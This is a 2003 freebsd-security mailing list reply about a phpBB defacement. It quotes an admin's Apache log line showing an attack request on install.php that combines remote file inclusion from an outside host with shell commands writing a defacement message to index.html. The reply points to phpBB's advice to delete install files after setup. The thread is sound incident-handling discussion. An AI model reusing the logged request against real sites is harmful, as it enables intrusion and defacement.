hack ? - urgent - false FreeBSD alarm
Kevin D. Kinsey, DaleCo, S.P.
kdk at daleco.biz
Fri Nov 7 11:49:03 PST 2003
Miha Nedok wrote:
>Hi !
>
>It is phpBB related. I found in logs:
>200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET
>/forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site-
>name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex at hotmail.com%20>%20index.html
>HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
>
>
>
>I just did chmod 000 `find -name 'install.php'` for a workaround.
>
>Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 .
>
>
>
>-Miha
>
>
>
>
>
From ~/phpp/docs/Install.html:
_6. Important post-Install tasks for all installation methods_
Once you have succssfully installed phpBB 2.0.0 you *MUST* ensure you
remove install.php, upgrade.php and update_to_FINAL.php files. Leaving
these in place is a _very serious potential security issue_.
Additionally you may delete the db/schemas, docs/ and contrib/
directories if you wish.
More information about the freebsd-security
mailing list